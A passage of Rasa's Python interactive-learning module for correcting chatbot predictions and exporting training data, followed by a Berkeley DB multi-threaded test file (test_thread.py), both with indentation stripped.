s = Story.from_events(parsed_events)
f.write("\n" + s.as_story_string(flat=True))
async def _write_nlu_to_file(
export_nlu_path: Text, events: List[Dict[Text, Any]]
) -> None:
"""Write the nlu data of the sender_id to the file paths."""
from rasa.nlu.training_data import TrainingData
msgs = _collect_messages(events)
# noinspection PyBroadException
try:
previous_examples = loading.load_data(export_nlu_path)
except Exception as e:
logger.exception("An exception occurred while trying to load the NLU data.")
export_nlu_path = questionary.text(
message="Could not load existing NLU data, please "
"specify where to store NLU data learned in "
"this session (this will overwrite any "
"existing file). {}".format(str(e)),
default=PATHS["backup"],
).ask()
if export_nlu_path is None:
return
previous_examples = TrainingData()
nlu_data = previous_examples.merge(TrainingData(msgs))
# need to guess the format of the file before opening it to avoid a read
# in a write
if loading.guess_format(export_nlu_path) in {"md", "unk"}:
fformat = "md"
else:
fformat = "json"
with open(export_nlu_path, "w", encoding="utf-8") as f:
if fformat == "md":
f.write(nlu_data.as_markdown())
else:
f.write(nlu_data.as_json())
def _entities_from_messages(messages):
"""Return all entities that occur in atleast one of the messages."""
return list({e["entity"] for m in messages for e in m.data.get("entities", [])})
def _intents_from_messages(messages):
"""Return all intents that occur in at least one of the messages."""
# set of distinct intents
distinct_intents = {m.data["intent"] for m in messages if "intent" in m.data}
return distinct_intents
async def _write_domain_to_file(
domain_path: Text, events: List[Dict[Text, Any]], endpoint: EndpointConfig
) -> None:
"""Write an updated domain file to the file path."""
create_path(domain_path)
domain = await retrieve_domain(endpoint)
old_domain = Domain.from_dict(domain)
messages = _collect_messages(events)
actions = _collect_actions(events)
templates = NEW_TEMPLATES
# TODO for now there is no way to distinguish between action and form
collected_actions = list(
{e["name"] for e in actions if e["name"] not in default_action_names()}
)
new_domain = Domain(
intents=_intents_from_messages(messages),
entities=_entities_from_messages(messages),
slots=[],
templates=templates,
action_names=collected_actions,
form_names=[],
)
old_domain.merge(new_domain).persist_clean(domain_path)
async def _predict_till_next_listen(
endpoint: EndpointConfig,
sender_id: Text,
sender_ids: List[Text],
plot_file: Optional[Text],
) -> None:
"""Predict and validate actions until we need to wait for a user msg."""
listen = False
while not listen:
result = await request_prediction(endpoint, sender_id)
predictions = result.get("scores")
probabilities = [prediction["score"] for prediction in predictions]
pred_out = int(np.argmax(probabilities))
action_name = predictions[pred_out].get("action")
policy = result.get("policy")
confidence = result.get("confidence")
await _print_history(sender_id, endpoint)
await _plot_trackers(
sender_ids, plot_file, endpoint, unconfirmed=[ActionExecuted(action_name)]
)
listen = await _validate_action(
action_name, policy, confidence, predictions, endpoint, sender_id
)
await _plot_trackers(sender_ids, plot_file, endpoint)
tracker_dump = await retrieve_tracker(
endpoint, sender_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
if len(events) >= 2:
last_event = events[-2] # last event before action_listen
# if bot message includes buttons the user will get a list choice to reply
# the list choice is displayed in place of action listen
if last_event.get("event") == BotUttered.type_name and last_event["data"].get(
"buttons", None
):
data = last_event["data"]
message = last_event.get("text", "")
choices = [
button_to_string(button, idx)
for idx, button in enumerate(data.get("buttons"))
]
question = questionary.select(message, choices)
button_payload = cliutils.payload_from_button_question(question)
await send_message(endpoint, sender_id, button_payload)
async def _correct_wrong_nlu(
corrected_nlu: Dict[Text, Any],
events: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
) -> None:
"""A wrong NLU prediction got corrected, update core's tracker."""
revert_latest_user_utterance = UserUtteranceReverted().as_dict()
# `UserUtteranceReverted` also removes the `ACTION_LISTEN` event before, hence we
# have to replay it.
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
corrected_message = latest_user_message(events)
if corrected_message is None:
raise Exception("Failed to correct NLU data. User message not found.")
corrected_message["parse_data"] = corrected_nlu
await send_event(
endpoint,
sender_id,
[revert_latest_user_utterance, listen_for_next_message, corrected_message],
)
async def _correct_wrong_action(
corrected_action: Text,
endpoint: EndpointConfig,
sender_id: Text,
is_new_action: bool = False,
) -> None:
"""A wrong action prediction got corrected, update core's tracker."""
await send_action(
endpoint, sender_id, corrected_action, is_new_action=is_new_action
)
def _form_is_rejected(action_name, tracker):
"""Check if the form got rejected with the most recent action name."""
return (
tracker.get("active_form", {}).get("name")
and action_name != tracker["active_form"]["name"]
and action_name != ACTION_LISTEN_NAME
)
def _form_is_restored(action_name, tracker):
"""Check whether the form is called again after it was rejected."""
return (
tracker.get("active_form", {}).get("rejected")
and tracker.get("latest_action_name") == ACTION_LISTEN_NAME
and action_name == tracker.get("active_form", {}).get("name")
)
async def _confirm_form_validation(action_name, tracker, endpoint, sender_id):
"""Ask a user whether an input for a form should be validated.
Previous to this call, the active form was chosen after it was rejected."""
requested_slot = tracker.get("slots", {}).get(REQUESTED_SLOT)
validation_questions = questionary.confirm(
"Should '{}' validate user input to fill "
"the slot '{}'?".format(action_name, requested_slot)
)
validate_input = await _ask_questions(validation_questions, sender_id, endpoint)
if not validate_input:
# notify form action to skip validation
await send_event(
endpoint, sender_id, {"event": "form_validation", "validate": False}
)
elif not tracker.get("active_form", {}).get("validate"):
# handle contradiction with learned behaviour
warning_question = questionary.confirm(
"ERROR: FormPolicy predicted no form validation "
"based on previous training stories. "
"Make sure to remove contradictory stories "
"from training data. "
"Otherwise predicting no form validation "
"will not work as expected."
)
await _ask_questions(warning_question, sender_id, endpoint)
# notify form action to validate an input
await send_event(
endpoint, sender_id, {"event": "form_validation", "validate": True}
)
async def _validate_action(
action_name: Text,
policy: Text,
confidence: float,
predictions: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
) -> bool:
"""Query the user to validate if an action prediction is correct.
Returns `True` if the prediction is correct, `False` otherwise."""
question = questionary.confirm(
"The bot wants to run '{}', correct?".format(action_name)
)
is_correct = await _ask_questions(question, sender_id, endpoint)
if not is_correct:
action_name, is_new_action = await _request_action_from_user(
predictions, sender_id, endpoint
)
else:
is_new_action = False
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
if _form_is_rejected(action_name, tracker):
# notify the tracker that form was rejected
await send_event(
endpoint,
sender_id,
{
"event": "action_execution_rejected",
"name": tracker["active_form"]["name"],
},
)
elif _form_is_restored(action_name, tracker):
await _confirm_form_validation(action_name, tracker, endpoint, sender_id)
if not is_correct:
await _correct_wrong_action(
action_name, endpoint, sender_id, is_new_action=is_new_action
)
else:
await send_action(endpoint, sender_id, action_name, policy, confidence)
return action_name == ACTION_LISTEN_NAME
def _as_md_message(parse_data: Dict[Text, Any]) -> Text:
"""Display the parse data of a message in markdown format."""
from rasa.nlu.training_data.formats import MarkdownWriter
if parse_data.get("text", "").startswith(INTENT_MESSAGE_PREFIX):
return parse_data["text"]
if not parse_data.get("entities"):
parse_data["entities"] = []
# noinspection PyProtectedMember
return MarkdownWriter()._generate_message_md(parse_data)
def _validate_user_regex(latest_message: Dict[Text, Any], intents: List[Text]) -> bool:
"""Validate if a users message input is correct.
This assumes the user entered an intent directly, e.g. using
`/greet`. Return `True` if the intent is a known one."""
parse_data = latest_message.get("parse_data", {})
intent = parse_data.get("intent", {}).get("name")
if intent in intents:
return True
else:
return False
async def _validate_user_text(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> bool:
"""Validate a user message input as free text.
This assumes the user message is a text message (so NOT `/greet`)."""
parse_data = latest_message.get("parse_data", {})
text = _as_md_message(parse_data)
intent = parse_data.get("intent", {}).get("name")
entities = parse_data.get("entities", [])
if entities:
message = (
"Is the intent '{}' correct for '{}' and are "
"all entities labeled correctly?".format(intent, text)
)
else:
message = (
"Your NLU model classified '{}' with intent '{}'"
" and there are no entities, is this correct?".format(text, intent)
)
if intent is None:
print ("The NLU classification for '{}' returned '{}'".format(text, intent))
return False
else:
question = questionary.confirm(message)
return await _ask_questions(question, sender_id, endpoint)
async def _validate_nlu(
intents: List[Text], endpoint: EndpointConfig, sender_id: Text
) -> None:
"""Validate if a user message, either text or intent is correct.
If the prediction of the latest user message is incorrect,
the tracker will be corrected with the correct intent / entities."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
latest_message = latest_user_message(tracker.get("events", [])) or {}
if latest_message.get("text", "").startswith( # pytype: disable=attribute-error
INTENT_MESSAGE_PREFIX
):
valid = _validate_user_regex(latest_message, intents)
else:
valid = await _validate_user_text(latest_message, endpoint, sender_id)
if not valid:
corrected_intent = await _request_intent_from_user(
latest_message, intents, sender_id, endpoint
)
# corrected intents have confidence 1.0
corrected_intent["confidence"] = 1.0
events = tracker.get("events", [])
entities = await _correct_entities(latest_message, endpoint, sender_id)
corrected_nlu = {
"intent": corrected_intent,
"entities": entities,
"text": latest_message.get("text"),
}
await _correct_wrong_nlu(corrected_nlu, events, endpoint, sender_id)
async def _correct_entities(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> List[Dict[Text, Any]]:
"""Validate the entities of a user message.
Returns the corrected entities"""
from rasa.nlu.training_data.formats import MarkdownReader
parse_original = latest_message.get("parse_data", {})
entity_str = _as_md_message(parse_original)
question = questionary.text(
"Please mark the entities using [value](type) notation", default=entity_str
)
annotation = await _ask_questions(question, sender_id, endpoint)
# noinspection PyProtectedMember
parse_annotated = MarkdownReader()._parse_training_example(annotation)
corrected_entities = _merge_annotated_and_original_entities(
parse_annotated, parse_original
)
return corrected_entities
def _merge_annotated_and_original_entities(parse_annotated, parse_original):
# overwrite entities which have already been
# annotated in the original annotation to preserve
# additional entity parser information
entities = parse_annotated.get("entities", [])[:]
for i, entity in enumerate(entities):
for original_entity in parse_original.get("entities", []):
if _is_same_entity_annotation(entity, original_entity):
entities[i] = original_entity
break
return entities
def _is_same_entity_annotation(entity, other):
return entity["value"] == other["value"] and entity["entity"] == other["entity"]
async def _enter_user_message(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Request a new message from the user."""
question = questionary.text("Your input ->")
message = await _ask_questions(question, sender_id, endpoint, lambda a: not a)
if message == (INTENT_MESSAGE_PREFIX + constants.USER_INTENT_RESTART):
raise RestartConversation()
await send_message(endpoint, sender_id, message)
async def is_listening_for_message(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Check if the conversation is in need for a user message."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.APPLIED)
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") == UserUttered.type_name:
return False
elif e.get("event") == ActionExecuted.type_name:
return e.get("name") == ACTION_LISTEN_NAME
return False
async def _undo_latest(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Undo either the latest bot action or user message, whatever is last."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.ALL)
# Get latest `UserUtterance` or `ActionExecuted` event.
last_event_type = None
for i, e in enumerate(reversed(tracker.get("events", []))):
last_event_type = e.get("event")
if last_event_type in {ActionExecuted.type_name, UserUttered.type_name}:
break
elif last_event_type == Restarted.type_name:
break
if last_event_type == ActionExecuted.type_name:
undo_action = ActionReverted().as_dict()
await send_event(endpoint, sender_id, undo_action)
elif last_event_type == UserUttered.type_name:
undo_user_message = UserUtteranceReverted().as_dict()
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
await send_event(
endpoint, sender_id, [undo_user_message, listen_for_next_message]
)
async def _fetch_events(
sender_ids: List[Union[Text, List[Event]]], endpoint: EndpointConfig
) -> List[List[Event]]:
"""Retrieve all event trackers from the endpoint for all sender ids."""
event_sequences = []
for sender_id in sender_ids:
if isinstance(sender_id, str):
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
for conversation in _split_conversation_at_restarts(events):
parsed_events = rasa.core.events.deserialise_events(conversation)
event_sequences.append(parsed_events)
else:
event_sequences.append(sender_id)
return event_sequences
async def _plot_trackers(
sender_ids: List[Union[Text, List[Event]]],
output_file: Optional[Text],
endpoint: EndpointConfig,
unconfirmed: Optional[List[Event]] = None,
):
"""Create a plot of the trackers of the passed sender ids.
This assumes that the last sender id is the conversation we are currently
working on. If there are events that are not part of this active tracker
yet, they can be passed as part of `unconfirmed`. They will be appended
to the currently active conversation."""
if not output_file or not sender_ids:
# if there is no output file provided, we are going to skip plotting
# same happens if there are no sender ids
return None
event_sequences = await _fetch_events(sender_ids, endpoint)
if unconfirmed:
event_sequences[-1].extend(unconfirmed)
graph = await visualize_neighborhood(
event_sequences[-1], event_sequences, output_file=None, max_history=2
)
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, output_file)
def _print_help(skip_visualization: bool) -> None:
"""Print some initial help message for the user."""
if not skip_visualization:
visualization_url = DEFAULT_SERVER_FORMAT.format(DEFAULT_SERVER_PORT + 1)
visualization_help = "Visualisation at {}/visualization.html.".format(
visualization_url
)
else:
visualization_help = ""
rasa.cli.utils.print_success(
"Bot loaded. {}\n"
"Type a message and press enter "
"(press 'Ctr-c' to exit). "
"".format(visualization_help)
)
async def record_messages(
endpoint: EndpointConfig,
sender_id: Text = UserMessage.DEFAULT_SENDER_ID,
max_message_limit: Optional[int] = None,
stories: Optional[Text] = None,
skip_visualization: bool = False,
):
"""Read messages from the command line and print bot responses."""
from rasa.core import training
try:
_print_help(skip_visualization)
try:
domain = await retrieve_domain(endpoint)
except ClientError:
logger.exception(
"Failed to connect to Rasa Core server at '{}'. "
"Is the server running?".format(endpoint.url)
)
return
trackers = await training.load_data(
stories,
Domain.from_dict(domain),
augmentation_factor=0,
use_story_concatenation=False,
)
intents = [next(iter(i)) for i in (domain.get("intents") or [])]
num_messages = 0
sender_ids = [t.events for t in trackers] + [sender_id]
if not skip_visualization:
plot_file = "story_graph.dot"
await _plot_trackers(sender_ids, plot_file, endpoint)
else:
plot_file = None
while not utils.is_limit_reached(num_messages, max_message_limit):
try:
if await is_listening_for_message(sender_id, endpoint):
await _enter_user_message(sender_id, endpoint)
await _validate_nlu(intents, endpoint, sender_id)
await _predict_till_next_listen(
endpoint, sender_id, sender_ids, plot_file
)
num_messages += 1
except RestartConversation:
await send_event(endpoint, sender_id, Restarted().as_dict())
await send_event(
endpoint, sender_id, ActionExecuted(ACTION_LISTEN_NAME).as_dict()
)
logger.info("Restarted conversation, starting a new one.")
except UndoLastStep:
await _undo_latest(sender_id, endpoint)
await _print_history(sender_id, endpoint)
except ForkTracker:
await _print_history(sender_id, endpoint)
events_fork = await _request_fork_from_user(sender_id, endpoint)
await send_event(endpoint, sender_id, Restarted().as_dict())
if events_fork:
for evt in events_fork:
await send_event(endpoint, sender_id, evt)
logger.info("Restarted conversation at fork.")
await _print_history(sender_id, endpoint)
await _plot_trackers(sender_ids, plot_file, endpoint)
except Abort:
return
except Exception:
logger.exception("An exception occurred while recording messages.")
raise
def _serve_application(app, stories, skip_visualization):
"""Start a core server and attach the interactive learning IO."""
endpoint = EndpointConfig(url=DEFAULT_SERVER_URL)
async def run_interactive_io(running_app: Sanic):
"""Small wrapper to shut down the server once cmd io is done."""
await record_messages(
endpoint=endpoint,
stories=stories,
skip_visualization=skip_visualization,
sender_id=uuid.uuid4().hex,
)
logger.info("Killing Sanic server now.")
running_app.stop() # kill the sanic server
app.add_task(run_interactive_io)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT)
return app
def start_visualization(image_path: Text = None) -> None:
"""Add routes to serve the conversation visualization files."""
app = Sanic(__name__)
# noinspection PyUnusedLocal
@app.exception(NotFound)
async def ignore_404s(request, exception):
return response.text("Not found", status=404)
# noinspection PyUnusedLocal
@app.route(VISUALIZATION_TEMPLATE_PATH, methods=["GET"])
def visualisation_html(request):
return response.file(visualization.visualization_html_path())
# noinspection PyUnusedLocal
@app.route("/visualization.dot", methods=["GET"])
def visualisation_png(request):
try:
headers = {"Cache-Control": "no-cache"}
return response.file(os.path.abspath(image_path), headers=headers)
except FileNotFoundError:
return response.text("", 404)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT + 1, access_log=False)
# noinspection PyUnusedLocal
async def train_agent_on_start(args, endpoints, additional_arguments, app, loop):
_interpreter = NaturalLanguageInterpreter.create(args.get("nlu"), endpoints.nlu)
model_directory = args.get("out", tempfile.mkdtemp(suffix="_core_model"))
_agent = await train(
args.get("domain"),
args.get("stories"),
model_directory,
_interpreter,
endpoints,
args.get("dump_stories"),
args.get("config")[0],
None,
additional_arguments,
)
app.agent = _agent
async def wait_til_server_is_running(endpoint, max_retries=30, sleep_between_retries=1):
"""Try to reach the server, retry a couple of times and sleep in between."""
while max_retries:
try:
r = await retrieve_status(endpoint)
logger.info("Reached core: {}".format(r))
if not r.get("is_ready"):
# server did not finish loading the agent yet
# in this case, we need to wait till the model trained
# so we might be sleeping for a while...
await asyncio.sleep(sleep_between_retries)
continue
else:
# server is ready to go
return True
except ClientError:
max_retries -= 1
if max_retries:
await asyncio.sleep(sleep_between_retries)
return False
def run_interactive_learning(
stories: Text = None,
skip_visualization: bool = False,
server_args: Dict[Text, Any] = None,
additional_arguments: Dict[Text, Any] = None,
):
"""Start the interactive learning with the model of the agent."""
server_args = server_args or {}
if server_args.get("nlu_data"):
PATHS["nlu"] = server_args["nlu_data"]
if server_args.get("stories"):
PATHS["stories"] = server_args["stories"]
if server_args.get("domain"):
PATHS["domain"] = server_args["domain"]
if not skip_visualization:
p = Process(target=start_visualization, args=("story_graph.dot",))
p.daemon = True
p.start()
else:
p = None
app = run.configure_app(enable_api=True)
endpoints = AvailableEndpoints.read_endpoints(server_args.get("endpoints"))
# before_server_start handlers make sure the agent is loaded before the
# interactive learning IO starts
if server_args.get("model"):
app.register_listener(
partial(run.load_agent_on_start, server_args.get("model"), endpoints, None),
"before_server_start",
)
else:
app.register_listener(
partial(train_agent_on_start, server_args, endpoints, additional_arguments),
"before_server_start",
)
_serve_application(app, stories, skip_visualization)
if not skip_visualization and p is not None:
p.terminate()
p.join()
|
test_thread.py
|
"""
Copyright (c) 2008-2017, Jesus Cea Avion <jcea@jcea.es>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3. Neither the name of Jesus Cea Avion nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
"""
"""TestCases for multi-threaded access to a DB.
"""
import os
import sys
import time
import errno
from random import random
DASH = '-'
try:
WindowsError
except NameError:
class WindowsError(Exception):
pass
import unittest
from .test_all import db, dbutils, test_support, verbose, have_threads, \
get_new_environment_path, get_new_database_path
if have_threads :
from threading import Thread
if sys.version_info[0] < 3 :
from threading import currentThread
else :
from threading import current_thread as currentThread
#----------------------------------------------------------------------
class BaseThreadedTestCase(unittest.TestCase):
dbtype = db.DB_UNKNOWN # must be set in derived class
dbopenflags = 0
dbsetflags = 0
envflags = 0
def setUp(self):
if verbose:
dbutils._deadlock_VerboseFile = sys.stdout
self.homeDir = get_new_environment_path()
self.env = db.DBEnv()
self.setEnvOpts()
self.env.open(self.homeDir, self.envflags | db.DB_CREATE)
self.filename = self.__class__.__name__ + '.db'
self.d = db.DB(self.env)
if self.dbsetflags:
self.d.set_flags(self.dbsetflags)
self.d.open(self.filename, self.dbtype, self.dbopenflags|db.DB_CREATE)
def tearDown(self):
self.d.close()
self.env.close()
test_support.rmtree(self.homeDir)
def setEnvOpts(self):
pass
def makeData(self, key):
return DASH.join([key] * 5)
#----------------------------------------------------------------------
class ConcurrentDataStoreBase(BaseThreadedTestCase):
dbopenflags = db.DB_THREAD
envflags = db.DB_THREAD | db.DB_INIT_CDB | db.DB_INIT_MPOOL
readers = 0 # derived class should set
writers = 0
records = 1000
def test01_1WriterMultiReaders(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test01_1WriterMultiReaders..." % \
self.__class__.__name__)
keys=list(range(self.records))
import random
random.shuffle(keys)
records_per_writer=self.records//self.writers
readers_per_writer=self.readers//self.writers
self.assertEqual(self.records,self.writers*records_per_writer)
self.assertEqual(self.readers,self.writers*readers_per_writer)
self.assertTrue((records_per_writer%readers_per_writer)==0)
readers = []
for x in range(self.readers):
rt = Thread(target = self.readerThread,
args = (self.d, x),
name = 'reader %d' % x,
)#verbose = verbose)
if sys.version_info[0] < 3 :
rt.setDaemon(True)
else :
rt.daemon = True
readers.append(rt)
writers=[]
for x in range(self.writers):
a=keys[records_per_writer*x:records_per_writer*(x+1)]
a.sort() # Generate conflicts
b=readers[readers_per_writer*x:readers_per_writer*(x+1)]
wt = Thread(target = self.writerThread,
args = (self.d, a, b),
name = 'writer %d' % x,
)#verbose = verbose)
writers.append(wt)
for t in writers:
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
for t in writers:
t.join()
for t in readers:
t.join()
def writerThread(self, d, keys, readers):
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
if verbose:
print("%s: creating records %d - %d" % (name, start, stop))
count=len(keys)//len(readers)
count2=count
for x in keys :
key = '%04d' % x
dbutils.DeadlockWrap(d.put, key, self.makeData(key),
max_retries=12)
if verbose and x % 100 == 0:
print("%s: records %d - %d finished" % (name, start, x))
count2-=1
if not count2 :
readers.pop().start()
count2=count
if verbose:
print("%s: finished creating records" % name)
if verbose:
print("%s: thread finished" % name)
def readerThread(self, d, readerNum):
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
for i in range(5) :
c = d.cursor()
count = 0
rec = c.first()
while rec:
count += 1
key, data = rec
self.assertEqual(self.makeData(key), data)
rec = next(c)
if verbose:
print("%s: found %d records" % (name, count))
c.close()
if verbose:
print("%s: thread finished" % name)
class BTreeConcurrentDataStore(ConcurrentDataStoreBase):
dbtype = db.DB_BTREE
writers = 2
readers = 10
records = 1000
class HashConcurrentDataStore(ConcurrentDataStoreBase):
dbtype = db.DB_HASH
writers = 2
readers = 10
records = 1000
#----------------------------------------------------------------------
class SimpleThreadedBase(BaseThreadedTestCase):
dbopenflags = db.DB_THREAD
envflags = db.DB_THREAD | db.DB_INIT_MPOOL | db.DB_INIT_LOCK
readers = 10
writers = 2
records = 1000
def setEnvOpts(self):
self.env.set_lk_detect(db.DB_LOCK_DEFAULT)
def test02_SimpleLocks(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test02_SimpleLocks..." % self.__class__.__name__)
keys=list(range(self.records))
import random
random.shuffle(keys)
records_per_writer=self.records//self.writers
readers_per_writer=self.readers//self.writers
self.assertEqual(self.records,self.writers*records_per_writer)
self.assertEqual(self.readers,self.writers*readers_per_writer)
self.assertTrue((records_per_writer%readers_per_writer)==0)
readers = []
for x in range(self.readers):
rt = Thread(target = self.readerThread,
args = (self.d, x),
name = 'reader %d' % x,
)#verbose = verbose)
if sys.version_info[0] < 3 :
rt.setDaemon(True)
else :
rt.daemon = True
readers.append(rt)
writers = []
for x in range(self.writers):
a=keys[records_per_writer*x:records_per_writer*(x+1)]
a.sort() # Generate conflicts
b=readers[readers_per_writer*x:readers_per_writer*(x+1)]
wt = Thread(target = self.writerThread,
args = (self.d, a, b),
name = 'writer %d' % x,
)#verbose = verbose)
writers.append(wt)
for t in writers:
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
for t in writers:
t.join()
for t in readers:
t.join()
def writerThread(self, d, keys, readers):
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
if verbose:
print("%s: creating records %d - %d" % (name, start, stop))
count=len(keys)//len(readers)
count2=count
for x in keys :
key = '%04d' % x
dbutils.DeadlockWrap(d.put, key, self.makeData(key),
max_retries=12)
if verbose and x % 100 == 0:
print("%s: records %d - %d finished" % (name, start, x))
count2-=1
if not count2 :
readers.pop().start()
count2=count
if verbose:
print("%s: thread finished" % name)
def readerThread(self, d, readerNum):
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
c = d.cursor()
count = 0
rec = dbutils.DeadlockWrap(c.first, max_retries=10)
while rec:
count += 1
key, data = rec
self.assertEqual(self.makeData(key), data)
rec = dbutils.DeadlockWrap(c.__next__, max_retries=10)
if verbose:
print("%s: found %d records" % (name, count))
c.close()
if verbose:
print("%s: thread finished" % name)
class BTreeSimpleThreaded(SimpleThreadedBase):
dbtype = db.DB_BTREE
class HashSimpleThreaded(SimpleThreadedBase):
dbtype = db.DB_HASH
#----------------------------------------------------------------------
class ThreadedTransactionsBase(BaseThreadedTestCase):
dbopenflags = db.DB_THREAD | db.DB_AUTO_COMMIT
envflags = (db.DB_THREAD |
db.DB_INIT_MPOOL |
db.DB_INIT_LOCK |
db.DB_INIT_LOG |
db.DB_INIT_TXN
)
readers = 0
writers = 0
records = 2000
txnFlag = 0
def setEnvOpts(self):
#self.env.set_lk_detect(db.DB_LOCK_DEFAULT)
pass
def test03_ThreadedTransactions(self):
if verbose:
print('\n', '-=' * 30)
print("Running %s.test03_ThreadedTransactions..." % \
self.__class__.__name__)
keys=list(range(self.records))
import random
random.shuffle(keys)
records_per_writer=self.records//self.writers
readers_per_writer=self.readers//self.writers
self.assertEqual(self.records,self.writers*records_per_writer)
self.assertEqual(self.readers,self.writers*readers_per_writer)
self.assertTrue((records_per_writer%readers_per_writer)==0)
readers=[]
for x in range(self.readers):
rt = Thread(target = self.readerThread,
args = (self.d, x),
name = 'reader %d' % x,
)#verbose = verbose)
if sys.version_info[0] < 3 :
rt.setDaemon(True)
else :
rt.daemon = True
readers.append(rt)
writers = []
for x in range(self.writers):
a=keys[records_per_writer*x:records_per_writer*(x+1)]
b=readers[readers_per_writer*x:readers_per_writer*(x+1)]
wt = Thread(target = self.writerThread,
args = (self.d, a, b),
name = 'writer %d' % x,
)#verbose = verbose)
writers.append(wt)
dt = Thread(target = self.deadlockThread)
if sys.version_info[0] < 3 :
dt.setDaemon(True)
else :
dt.daemon = True
dt.start()
for t in writers:
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
for t in writers:
t.join()
for t in readers:
t.join()
self.doLockDetect = False
dt.join()
def writerThread(self, d, keys, readers):
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
count=len(keys)//len(readers)
while len(keys):
try:
txn = self.env.txn_begin(None, self.txnFlag)
keys2=keys[:count]
for x in keys2 :
key = '%04d' % x
d.put(key, self.makeData(key), txn)
if verbose and x % 100 == 0:
print("%s: records %d - %d finished" % (name, start, x))
txn.commit()
keys=keys[count:]
readers.pop().start()
except (db.DBLockDeadlockError, db.DBLockNotGrantedError) as val:
if verbose:
print("%s: Aborting transaction (%s)" % (name,
val.args[1]))
txn.abort()
if verbose:
print("%s: thread finished" % name)
def readerThread(self, d, readerNum):
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
finished = False
while not finished:
try:
txn = self.env.txn_begin(None, self.txnFlag)
c = d.cursor(txn)
count = 0
rec = c.first()
while rec:
count += 1
key, data = rec
self.assertEqual(self.makeData(key), data)
rec = next(c)
if verbose: print("%s: found %d records" % (name, count))
c.close()
txn.commit()
finished = True
except (db.DBLockDeadlockError, db.DBLockNotGrantedError) as val:
if verbose:
print("%s: Aborting transaction (%s)" % (name,
val.args[1]))
c.close()
txn.abort()
if verbose:
print("%s: thread finished" % name)
def deadlockThread(self):
self.doLockDetect = True
while self.doLockDetect:
time.sleep(0.05)
try:
aborted = self.env.lock_detect(
db.DB_LOCK_RANDOM, db.DB_LOCK_CONFLICT)
if verbose and aborted:
print("deadlock: Aborted %d deadlocked transaction(s)" \
% aborted)
except db.DBError:
pass
class BTreeThreadedTransactions(ThreadedTransactionsBase):
dbtype = db.DB_BTREE
writers = 2
readers = 10
records = 1000
class HashThreadedTransactions(ThreadedTransactionsBase):
dbtype = db.DB_HASH
writers = 2
readers = 10
records = 1000
class BTreeThreadedNoWaitTransactions(ThreadedTransactionsBase):
dbtype = db.DB_BTREE
writers = 2
readers = 10
records = 1000
txnFlag = db.DB_TXN_NOWAIT
class HashThreadedNoWaitTransactions(ThreadedTransactionsBase):
dbtype = db.DB_HASH
writers = 2
readers = 10
records = 1000
txnFlag = db.DB_TXN_NOWAIT
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if have_threads:
suite.addTest(unittest.makeSuite(BTreeConcurrentDataStore))
suite.addTest(unittest.makeSuite(HashConcurrentDataStore))
suite.addTest(unittest.makeSuite(BTreeSimpleThreaded))
suite.addTest(unittest.makeSuite(HashSimpleThreaded))
suite.addTest(unittest.makeSuite(BTreeThreadedTransactions))
suite.addTest(unittest.makeSuite(HashThreadedTransactions))
suite.addTest(unittest.makeSuite(BTreeThreadedNoWaitTransactions))
